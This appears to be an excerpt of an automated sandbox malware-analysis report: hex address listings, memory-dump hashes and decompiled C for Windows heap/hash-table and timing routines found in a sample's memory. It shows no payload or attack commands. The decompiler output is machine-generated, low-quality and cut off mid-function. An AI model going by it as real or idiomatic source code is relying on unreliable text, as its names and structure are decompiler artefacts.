                                                                            0x1d835113
                                                                            0x1d835113
                                                                            0x00000000
                                                                            0x1d7e08cd
                                                                            0x1d7e08bf
                                                                            0x1d7e08bf
                                                                            0x00000000
                                                                            0x1d7e08bf
                                                                            0x1d7e08ab
                                                                            0x1d7e08ab
                                                                            0x00000000
                                                                            0x1d7e08ab
                                                                            0x1d7e089d
                                                                            0x1d7e089d
                                                                            0x00000000
                                                                            0x1d7e089d
                                                                            0x1d7e07f0
                                                                            0x1d7e07f0
                                                                            0x1d7e07f8
                                                                            0x1d835014
                                                                            0x1d835017
                                                                            0x1d83501a
                                                                            0x1d835036
                                                                            0x1d83503d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83501c
                                                                            0x1d83501c
                                                                            0x1d83501c
                                                                            0x1d83501e
                                                                            0x1d835020
                                                                            0x1d835023
                                                                            0x1d835026
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835028
                                                                            0x1d83502b
                                                                            0x1d83502e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d835030
                                                                            0x1d835035
                                                                            0x1d835035
                                                                            0x00000000
                                                                            0x1d835035
                                                                            0x1d7e07fe
                                                                            0x1d7e07fe
                                                                            0x1d7e0801
                                                                            0x1d7e0803
                                                                            0x1d7e0808
                                                                            0x1d835053
                                                                            0x1d7e0816
                                                                            0x1d7e0816
                                                                            0x1d7e0818
                                                                            0x1d7e0818
                                                                            0x00000000
                                                                            0x1d7e0808
                                                                            0x1d7e07ee
                                                                            0x1d7e0789
                                                                            0x1d7e0789
                                                                            0x00000000
                                                                            0x1d7e0789
                                                                            0x1d7e0732
                                                                            0x1d7e0736
                                                                            0x1d834f63
                                                                            0x1d834f66
                                                                            0x1d834f66
                                                                            0x1d834f6b
                                                                            0x1d834f6d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d834f76
                                                                            0x1d834f79
                                                                            0x1d834f7b
                                                                            0x1d834f8d
                                                                            0x1d834f92
                                                                            0x1d834f92
                                                                            0x1d834f95
                                                                            0x00000000
                                                                            0x1d834f95
                                                                            0x1d7e073c
                                                                            0x1d7e0742
                                                                            0x1d7e074b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7e074b
                                                                            0x1d7e06ff

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                            • Instruction ID: 48195aa13d24bff9f764bc199e7eea7cb9f79928e2f0a4add7c11883ea3e935f
                                                                            • Opcode Fuzzy Hash: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                            • Instruction Fuzzy Hash: D6F1FD74A00656EFDB06CF68C894B6AB7B5FF84750F1081A9E5099B391D730F981CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D8AACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 45%
                                                                            			E1D8AACEB(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int* _v12;
				signed char _v13;
				signed char _v14;
				signed char _v16;
				signed int _v20;
				signed int _v21;
				signed int _v22;
				signed char _v24;
				signed char _v25;
				signed char _v26;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int* _t146;
				signed int _t149;
				signed int _t151;
				signed int _t167;
				signed int _t169;
				signed int _t173;
				signed char _t176;
				signed int _t195;
				void* _t211;
				signed int _t250;
				signed int _t251;
				signed int _t253;
				intOrPtr* _t254;
				signed int _t261;
				signed char _t267;
				signed char _t274;
				intOrPtr _t283;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int* _t304;
				signed char _t305;
				void* _t333;
				unsigned int _t335;
				signed int _t336;
				signed char _t337;
				unsigned int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				intOrPtr _t349;
				signed char _t351;
				signed int _t353;
				signed char _t354;
				unsigned int _t355;
				unsigned int _t356;
				signed int _t358;
				unsigned int _t360;
				void* _t361;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				void* _t369;
				void* _t370;
				void* _t371;
				void* _t372;
				signed char* _t374;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed char _t381;
				unsigned int _t383;

				_t146 = __edx;
				_v8 = __ecx;
				_v12 = __edx;
				_t251 = 0x4cb2f;
				_t3 = _t146 + 4; // 0x8b0775c0
				_t374 =  *_t3;
				_t360 =  *__edx << 2;
				if(_t360 < 8) {
					L3:
					_t361 = _t360 - 1;
					if(_t361 == 0) {
						L16:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						L17:
						_t375 = _v8;
						_t12 = _t375 + 0x1c; // 0x1d8aabd2
						_v24 = _t12;
						_t149 = L1D7D53C0(_t12);
						_t362 = 0;
						while(1) {
							L18:
							_t14 = _t375 + 4; // 0x8bf8558b
							_t335 =  *_t14;
							_t151 = (_t149 | 0xffffffff) << (_t335 & 0x0000001f);
							_t267 = _t251 & _t151;
							_v28 = _t151;
							_v20 = _t267;
							_v16 = _t267;
							if(_t362 != 0) {
								goto L21;
							}
							_t356 = _t335 >> 5;
							if(_t356 == 0) {
								_t362 = 0;
								L30:
								if(_t362 == 0) {
									L34:
									_t33 = _t375 + 0x1c; // 0x1d8aabd2
									E1D7D52F0(_t267, _t33);
									_t35 = _t375 + 0x28; // 0x8b0a74f6
									_t36 = _t375 + 0x20; // 0x8bb372c7
									 *0x1d8c91e0(0xc +  *_v12 * 4,  *_t35);
									_t337 =  *((intOrPtr*)( *_t36))();
									_v16 = _t337;
									if(_t337 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										 *(_t337 + 8) =  *(_t337 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t337 + 0xb)) =  *_v12;
										 *(_t337 + 4) = _t251;
										_t46 = _t337 + 0xc; // 0xc
										_t167 = L1D7E2330(E1D8188C0(_t46, _v12[1],  *_v12 << 2), _v24);
										_t377 = _v8;
										_t364 = 0;
										do {
											_t49 = _t377 + 4; // 0x8bf8558b
											_t338 =  *_t49;
											_t169 = (_t167 | 0xffffffff) << (_t338 & 0x0000001f);
											_v28 = _t169;
											_t274 = _t169 & _t251;
											_v20 = _t274;
											_v24 = _t274;
											if(_t364 != 0) {
												L40:
												_t339 = _v28;
												while(1) {
													_t364 =  *_t364;
													if((_t364 & 0x00000001) != 0) {
														break;
													}
													if(_t274 == ( *(_t364 + 4) & _t339)) {
														L45:
														if(_t364 == 0) {
															L52:
															_t253 = _t377;
															_t68 = _t253 + 0x28; // 0x8b0a74f6
															_t69 = _t253 + 4; // 0x8bf8558b
															_t378 =  *_t69;
															_t70 = _t253 + 0x20; // 0x8bb372c7
															_t365 =  *_t70;
															_v28 =  *_t68;
															_t72 = _t253 + 0x24; // 0x85f633fe
															_v40 =  *_t72;
															_t173 = _t378 >> 5;
															if( *_t253 < _t173 + _t173) {
																L73:
																_t380 = _v16;
																_t364 = _t380;
																_t176 = (_t173 | 0xffffffff) << (_t378 & 0x0000001f) &  *(_t380 + 4);
																_v40 = _t176;
																_v28 = _t176;
																_t343 = (_t378 >> 0x00000005) - 0x00000001 & ((((_t176 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_v40 & 0x000000ff)) * 0x00000025 + (_v26 & 0x000000ff)) * 0x00000025 + (_v25 & 0x000000ff);
																_t136 = _t253 + 8; // 0xc183f44d
																_t283 =  *_t136;
																 *_t380 =  *(_t283 + _t343 * 4);
																 *(_t283 + _t343 * 4) = _t380;
																 *_t253 =  *_t253 + 1;
																_t381 = 0;
																L74:
																_t141 = _t253 + 0x1c; // 0x1d8aabd2
																E1D7E24D0(_t141);
																if(_t381 != 0) {
																	_t142 = _t253 + 0x28; // 0x8b0a74f6
																	_t143 = _t253 + 0x24; // 0x85f633fe
																	 *0x1d8c91e0(_t381,  *_t142);
																	 *((intOrPtr*)( *_t143))();
																}
																L76:
																return _t364;
															}
															_t285 = 2;
															_t173 = E1D804CF8( &_v24, _t173 * _t285, _t173 * _t285 >> 0x20);
															if(_t173 < 0) {
																goto L73;
															}
															_t383 = _v24;
															if(_t383 < 4) {
																_t383 = 4;
															}
															 *0x1d8c91e0(_t383 << 2, _v28);
															_t173 =  *_t365();
															_t345 = _t173;
															_v12 = _t345;
															if(_t345 == 0) {
																_t144 = _t253 + 4; // 0x8bf8558b
																_t378 =  *_t144;
																if(_t378 >= 0x20) {
																	goto L73;
																}
																_t381 = _v16;
																_t364 = 0;
																goto L74;
															} else {
																_t83 = _t383 - 1; // 0x3
																_t288 = _t83;
																if((_t383 & _t288) == 0) {
																	L61:
																	if(_t383 > 0x4000000) {
																		_t383 = 0x4000000;
																	}
																	_t366 = _t345;
																	_v24 = _v24 & 0x00000000;
																	_t195 = _t253 | 0x00000001;
																	asm("sbb ecx, ecx");
																	_t292 =  !( &(_v12[_t383])) & _t383 << 0x00000002 >> 0x00000002;
																	if(_t292 <= 0) {
																		L66:
																		_t92 = _t253 + 4; // 0x8bf8558b
																		_t367 = 0;
																		_v32 = (_t195 | 0xffffffff) << ( *_t92 & 0x0000001f);
																		if(( *(_t253 + 4) & 0xffffffe0) <= 0) {
																			L71:
																			_t121 = _t253 + 8; // 0xc183f44d
																			_t295 =  *_t121;
																			 *((intOrPtr*)(_t253 + 8)) = _v12;
																			_t124 = _t253 + 4; // 0x8bf8558b
																			_t173 =  *_t124 & 0x0000001f;
																			_t378 = _t383 << 0x00000005 | _t173;
																			 *(_t253 + 4) = _t378;
																			if(_t295 != 0) {
																				 *0x1d8c91e0(_t295, _v28);
																				_t173 =  *_v40();
																				_t128 = _t253 + 4; // 0x8bf8558b
																				_t378 =  *_t128;
																			}
																			goto L73;
																		} else {
																			goto L67;
																		}
																		do {
																			L67:
																			_t97 = _t253 + 8; // 0xc183f44d
																			_t349 =  *_t97;
																			_v36 = _t349;
																			while(1) {
																				_t297 =  *(_t349 + _t367 * 4);
																				_v20 = _t297;
																				if((_t297 & 0x00000001) != 0) {
																					goto L70;
																				}
																				 *(_t349 + _t367 * 4) =  *_t297;
																				_t351 =  *(_t297 + 4) & _v32;
																				_t254 = _v20;
																				_v24 = _t351;
																				_t353 = _t383 - 0x00000001 & ((((_t351 & 0x000000ff) + 0x00b15dcb) * 0x00000025 + (_t351 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025 + (_v21 & 0x000000ff);
																				_t304 = _v12;
																				 *_t254 =  *((intOrPtr*)(_t304 + _t353 * 4));
																				 *((intOrPtr*)(_t304 + _t353 * 4)) = _t254;
																				_t349 = _v36;
																			}
																			L70:
																			_t253 = _v8;
																			_t367 = _t367 + 1;
																			_t120 = _t253 + 4; // 0x8bf8558b
																		} while (_t367 <  *_t120 >> 5);
																		goto L71;
																	} else {
																		_t354 = _v24;
																		do {
																			_t354 = _t354 + 1;
																			 *_t366 = _t195;
																			_t366 = _t366 + 4;
																		} while (_t354 < _t292);
																		goto L66;
																	}
																}
																_t305 = _t288 | 0xffffffff;
																if(_t383 == 0) {
																	L60:
																	_t383 = 1 << _t305;
																	goto L61;
																} else {
																	goto L59;
																}
																do {
																	L59:
																	_t305 = _t305 + 1;
																	_t383 = _t383 >> 1;
																} while (_t383 != 0);
																goto L60;
															}
														}
														goto L46;
													}
												}
												_t364 = 0;
												goto L45;
											}
											_t355 = _t338 >> 5;
											if(_t355 == 0) {
												_t364 = 0;
												L49:
												if(_t364 == 0) {
													goto L52;
												}
												_t66 = _t364 + 8; // 0x8
												_t211 = E1D8AAC6F(_t66);
												_t253 = _t377;
												_t381 = _v16;
												if(_t211 == 0) {
													_t364 = 0;
												}
												goto L74;
											}
											_t56 = _t355 - 1; // 0x8bf8558a
											_t57 = _t377 + 8; // 0xc183f44d
											_t364 =  *_t57 + (_t56 & (_v21 & 0x000000ff) + 0x164b2f3f + (((_t274 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v22 & 0x000000ff)) * 0x00000025) * 4;
											_t274 = _v20;
											goto L40;
											L46:
											_t167 = E1D8AACB2(_t364, _v12);
										} while (_t167 == 0);
										goto L49;
									}
									_t364 = 0;
									goto L76;
								}
								_t31 = _t362 + 8; // 0x8
								_t314 = _t31;
								if(E1D8AAC6F(_t31) == 0) {
									_t364 = 0;
								}
								E1D7D52F0(_t314, _v24);
								goto L76;
							}
							_t21 = _t356 - 1; // 0x8bf8558a
							_t22 = _t375 + 8; // 0xc183f44d
							_t362 =  *_t22 + (_t21 & (_v13 & 0x000000ff) + 0x164b2f3f + (((_t267 & 0x000000ff) * 0x00000025 + (_v20 & 0x000000ff)) * 0x00000025 + (_v14 & 0x000000ff)) * 0x00000025) * 4;
							_t267 = _v20;
							L21:
							_t336 = _v28;
							while(1) {
								_t362 =  *_t362;
								if((_t362 & 0x00000001) != 0) {
									break;
								}
								if(_t267 == ( *(_t362 + 4) & _t336)) {
									L26:
									if(_t362 == 0) {
										goto L34;
									}
									_t149 = E1D8AACB2(_t362, _v12);
									if(_t149 != 0) {
										goto L30;
									}
									goto L18;
								}
							}
							_t362 = 0;
							goto L26;
						}
					}
					_t368 = _t361 - 1;
					if(_t368 == 0) {
						L15:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L16;
					}
					_t369 = _t368 - 1;
					if(_t369 == 0) {
						L14:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L15;
					}
					_t370 = _t369 - 1;
					if(_t370 == 0) {
						L13:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L14;
					}
					_t371 = _t370 - 1;
					if(_t371 == 0) {
						L12:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L13;
					}
					_t372 = _t371 - 1;
					if(_t372 == 0) {
						L11:
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L12;
					}
					if(_t372 != 1) {
						goto L17;
					} else {
						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
						_t374 =  &(_t374[1]);
						goto L11;
					}
				} else {
					_t358 = _t360 >> 3;
					_t360 = _t360 + _t358 * 0xfffffff8;
					do {
						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
						_t250 = _t374[7] & 0x000000ff;
						_t374 =  &(_t374[8]);
						_t251 = _t261 + _t333 + _t250;
						_t358 = _t358 - 1;
					} while (_t358 != 0);
					goto L3;
				}
			}












































































                                                                            0x1d8aacf4
                                                                            0x1d8aacf6
                                                                            0x1d8aacfb
                                                                            0x1d8aacfe
                                                                            0x1d8aad05
                                                                            0x1d8aad05
                                                                            0x1d8aad08
                                                                            0x1d8aad0e
                                                                            0x1d8aad6f
                                                                            0x1d8aad6f
                                                                            0x1d8aad72
                                                                            0x1d8aadc8
                                                                            0x1d8aadce
                                                                            0x1d8aadd0
                                                                            0x1d8aadd0
                                                                            0x1d8aadd3
                                                                            0x1d8aadd7
                                                                            0x1d8aadda
                                                                            0x1d8aaddf
                                                                            0x1d8aade1
                                                                            0x1d8aade1
                                                                            0x1d8aade1
                                                                            0x1d8aade1
                                                                            0x1d8aadec
                                                                            0x1d8aadf0
                                                                            0x1d8aadf2
                                                                            0x1d8aadf5
                                                                            0x1d8aadf8
                                                                            0x1d8aadfd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aadff
                                                                            0x1d8aae04
                                                                            0x1d8aae69
                                                                            0x1d8aae6b
                                                                            0x1d8aae6d
                                                                            0x1d8aae8b
                                                                            0x1d8aae8b
                                                                            0x1d8aae8f
                                                                            0x1d8aae97
                                                                            0x1d8aae9a
                                                                            0x1d8aaea9
                                                                            0x1d8aaeb1
                                                                            0x1d8aaeb3
                                                                            0x1d8aaeb8
                                                                            0x1d8aaec8
                                                                            0x1d8aaec9
                                                                            0x1d8aaeca
                                                                            0x1d8aaed6
                                                                            0x1d8aaedb
                                                                            0x1d8aaede
                                                                            0x1d8aaeea
                                                                            0x1d8aaef9
                                                                            0x1d8aaefe
                                                                            0x1d8aaf01
                                                                            0x1d8aaf03
                                                                            0x1d8aaf03
                                                                            0x1d8aaf03
                                                                            0x1d8aaf0e
                                                                            0x1d8aaf12
                                                                            0x1d8aaf15
                                                                            0x1d8aaf17
                                                                            0x1d8aaf1a
                                                                            0x1d8aaf1f
                                                                            0x1d8aaf5b
                                                                            0x1d8aaf5b
                                                                            0x1d8aaf5e
                                                                            0x1d8aaf5e
                                                                            0x1d8aaf66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aaf6f
                                                                            0x1d8aaf75
                                                                            0x1d8aaf77
                                                                            0x1d8aafae
                                                                            0x1d8aafae
                                                                            0x1d8aafb0
                                                                            0x1d8aafb3
                                                                            0x1d8aafb3
                                                                            0x1d8aafb6
                                                                            0x1d8aafb6
                                                                            0x1d8aafb9
                                                                            0x1d8aafbc
                                                                            0x1d8aafbf
                                                                            0x1d8aafc4
                                                                            0x1d8aafcc
                                                                            0x1d8ab11b
                                                                            0x1d8ab128
                                                                            0x1d8ab12d
                                                                            0x1d8ab12f
                                                                            0x1d8ab132
                                                                            0x1d8ab135
                                                                            0x1d8ab15e
                                                                            0x1d8ab160
                                                                            0x1d8ab160
                                                                            0x1d8ab166
                                                                            0x1d8ab168
                                                                            0x1d8ab16b
                                                                            0x1d8ab16d
                                                                            0x1d8ab16f
                                                                            0x1d8ab16f
                                                                            0x1d8ab173
                                                                            0x1d8ab17a
                                                                            0x1d8ab17c
                                                                            0x1d8ab180
                                                                            0x1d8ab185
                                                                            0x1d8ab18b
                                                                            0x1d8ab18b
                                                                            0x1d8ab18d
                                                                            0x1d8ab193
                                                                            0x1d8ab193
                                                                            0x1d8aafd4
                                                                            0x1d8aafdc
                                                                            0x1d8aafe3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aafe9
                                                                            0x1d8aafef
                                                                            0x1d8aaff3
                                                                            0x1d8aaff3
                                                                            0x1d8aafff
                                                                            0x1d8ab005
                                                                            0x1d8ab007
                                                                            0x1d8ab009
                                                                            0x1d8ab00e
                                                                            0x1d8ab194
                                                                            0x1d8ab194
                                                                            0x1d8ab19a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab1a0
                                                                            0x1d8ab1a3
                                                                            0x00000000
                                                                            0x1d8ab014
                                                                            0x1d8ab014
                                                                            0x1d8ab014
                                                                            0x1d8ab019
                                                                            0x1d8ab02c
                                                                            0x1d8ab033
                                                                            0x1d8ab035
                                                                            0x1d8ab035
                                                                            0x1d8ab03a
                                                                            0x1d8ab03c
                                                                            0x1d8ab049
                                                                            0x1d8ab052
                                                                            0x1d8ab056
                                                                            0x1d8ab058
                                                                            0x1d8ab067
                                                                            0x1d8ab067
                                                                            0x1d8ab070
                                                                            0x1d8ab07b
                                                                            0x1d8ab07e
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0ec
                                                                            0x1d8ab0f2
                                                                            0x1d8ab0f5
                                                                            0x1d8ab0fb
                                                                            0x1d8ab0fe
                                                                            0x1d8ab100
                                                                            0x1d8ab105
                                                                            0x1d8ab110
                                                                            0x1d8ab116
                                                                            0x1d8ab118
                                                                            0x1d8ab118
                                                                            0x1d8ab118
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab080
                                                                            0x1d8ab083
                                                                            0x1d8ab086
                                                                            0x1d8ab086
                                                                            0x1d8ab089
                                                                            0x1d8ab092
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab096
                                                                            0x1d8ab09c
                                                                            0x1d8ab0a7
                                                                            0x1d8ab0b0
                                                                            0x1d8ab0ca
                                                                            0x1d8ab0cc
                                                                            0x1d8ab0d2
                                                                            0x1d8ab0d6
                                                                            0x1d8ab0d9
                                                                            0x1d8ab0d9
                                                                            0x1d8ab0de
                                                                            0x1d8ab0de
                                                                            0x1d8ab0e1
                                                                            0x1d8ab0e2
                                                                            0x1d8ab0e8
                                                                            0x00000000
                                                                            0x1d8ab05a
                                                                            0x1d8ab05a
                                                                            0x1d8ab05d
                                                                            0x1d8ab05d
                                                                            0x1d8ab05e
                                                                            0x1d8ab060
                                                                            0x1d8ab063
                                                                            0x00000000
                                                                            0x1d8ab05d
                                                                            0x1d8ab058
                                                                            0x1d8ab01b
                                                                            0x1d8ab020
                                                                            0x1d8ab027
                                                                            0x1d8ab02a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8ab022
                                                                            0x1d8ab022
                                                                            0x1d8ab022
                                                                            0x1d8ab023
                                                                            0x1d8ab023
                                                                            0x00000000
                                                                            0x1d8ab022
                                                                            0x1d8ab00e
                                                                            0x00000000
                                                                            0x1d8aaf77
                                                                            0x1d8aaf71
                                                                            0x1d8aaf73
                                                                            0x00000000
                                                                            0x1d8aaf73
                                                                            0x1d8aaf21
                                                                            0x1d8aaf26
                                                                            0x1d8aaf8c
                                                                            0x1d8aaf8e
                                                                            0x1d8aaf90
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aaf92
                                                                            0x1d8aaf95
                                                                            0x1d8aaf9a
                                                                            0x1d8aaf9c
                                                                            0x1d8aafa1
                                                                            0x1d8aafa7
                                                                            0x1d8aafa7
                                                                            0x00000000
                                                                            0x1d8aafa1
                                                                            0x1d8aaf4d
                                                                            0x1d8aaf52
                                                                            0x1d8aaf55
                                                                            0x1d8aaf58
                                                                            0x00000000
                                                                            0x1d8aaf79
                                                                            0x1d8aaf7d
                                                                            0x1d8aaf82
                                                                            0x00000000
                                                                            0x1d8aaf8a
                                                                            0x1d8aaeba
                                                                            0x00000000
                                                                            0x1d8aaeba
                                                                            0x1d8aae6f
                                                                            0x1d8aae6f
                                                                            0x1d8aae79
                                                                            0x1d8aae7b
                                                                            0x1d8aae7b
                                                                            0x1d8aae81
                                                                            0x00000000
                                                                            0x1d8aae81
                                                                            0x1d8aae2b
                                                                            0x1d8aae30
                                                                            0x1d8aae33
                                                                            0x1d8aae36
                                                                            0x1d8aae39
                                                                            0x1d8aae39
                                                                            0x1d8aae3c
                                                                            0x1d8aae3c
                                                                            0x1d8aae44
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae4d
                                                                            0x1d8aae53
                                                                            0x1d8aae55
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae5b
                                                                            0x1d8aae62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d8aae64
                                                                            0x1d8aae4f
                                                                            0x1d8aae51
                                                                            0x00000000
                                                                            0x1d8aae51
                                                                            0x1d8aade1
                                                                            0x1d8aad74
                                                                            0x1d8aad77
                                                                            0x1d8aadbf
                                                                            0x1d8aadc5
                                                                            0x1d8aadc7
                                                                            0x00000000
                                                                            0x1d8aadc7
                                                                            0x1d8aad79
                                                                            0x1d8aad7c
                                                                            0x1d8aadb6
                                                                            0x1d8aadbc
                                                                            0x1d8aadbe
                                                                            0x00000000
                                                                            0x1d8aadbe
                                                                            0x1d8aad7e
                                                                            0x1d8aad81
                                                                            0x1d8aadad
                                                                            0x1d8aadb3
                                                                            0x1d8aadb5
                                                                            0x00000000
                                                                            0x1d8aadb5
                                                                            0x1d8aad83
                                                                            0x1d8aad86
                                                                            0x1d8aada4
                                                                            0x1d8aadaa
                                                                            0x1d8aadac
                                                                            0x00000000
                                                                            0x1d8aadac
                                                                            0x1d8aad88
                                                                            0x1d8aad8b
                                                                            0x1d8aad9b
                                                                            0x1d8aada1
                                                                            0x1d8aada3
                                                                            0x00000000
                                                                            0x1d8aada3
                                                                            0x1d8aad90
                                                                            0x00000000
                                                                            0x1d8aad92
                                                                            0x1d8aad98
                                                                            0x1d8aad9a
                                                                            0x00000000
                                                                            0x1d8aad9a
                                                                            0x1d8aad10
                                                                            0x1d8aad12
                                                                            0x1d8aad18
                                                                            0x1d8aad1a
                                                                            0x1d8aad54
                                                                            0x1d8aad59
                                                                            0x1d8aad5f
                                                                            0x1d8aad63
                                                                            0x1d8aad68
                                                                            0x1d8aad6a
                                                                            0x1d8aad6a
                                                                            0x00000000
                                                                            0x1d8aad1a

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                            • Instruction ID: 7816a99d739052c2e8c1207e840f0c8fc64439c243126d83e6de27575d036e71
                                                                            • Opcode Fuzzy Hash: a38576dc108c172ec6abe4241a8184600e719529e75528aeb80bbb1bd49cfe30
                                                                            • Instruction Fuzzy Hash: 6DF1F872E006259FCB08CF68C99167EFBF5EF88210B1A456EE496DB790D634EE41CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7FEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 74%
                                                                            			E1D7FEE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t215;
				signed int _t222;
				signed int _t227;
				signed int _t228;
				signed int _t231;
				signed int _t244;
				signed int _t247;
				char* _t250;
				intOrPtr _t255;
				signed int _t269;
				signed int* _t270;
				intOrPtr _t279;
				signed char _t284;
				signed int _t291;
				signed int _t292;
				intOrPtr _t301;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t309;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr* _t316;
				void* _t318;

				_push(0x7c);
				_push(0x1d8ac610);
				E1D827C40(__ebx, __edi, __esi);
				_t313 = __edx;
				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
				 *(_t318 - 0x58) = 0;
				 *((intOrPtr*)(_t318 - 0x74)) = 0;
				_t269 = 0;
				 *(_t318 - 0x64) = 0;
				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
				_t196 = __edx + 0x28;
				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
				L1D7E2330(_t196, _t196);
				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
				L1:
				while(1) {
					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
						E1D7E24D0( *((intOrPtr*)(_t318 - 0x78)));
						asm("sbb ebx, ebx");
						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
						return  ~_t269 & 0xc000022d;
					}
					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
					_t307 = 0x7ffe0010;
					_t270 = 0x7ffe03b0;
					goto L4;
					do {
						do {
							do {
								do {
									L4:
									_t201 =  *0x1d8c67f0; // 0x0
									 *(_t318 - 0x30) = _t201;
									_t202 =  *0x1d8c67f4; // 0x0
									 *(_t318 - 0x3c) = _t202;
									 *(_t318 - 0x28) =  *_t270;
									 *(_t318 - 0x5c) = _t270[1];
									while(1) {
										_t301 =  *0x7ffe000c;
										_t279 =  *0x7ffe0008;
										__eflags = _t301 -  *_t307;
										if(_t301 ==  *_t307) {
											goto L6;
										}
										asm("pause");
									}
									L6:
									_t270 = 0x7ffe03b0;
									_t308 =  *0x7ffe03b0;
									 *(_t318 - 0x38) = _t308;
									_t206 =  *0x7FFE03B4;
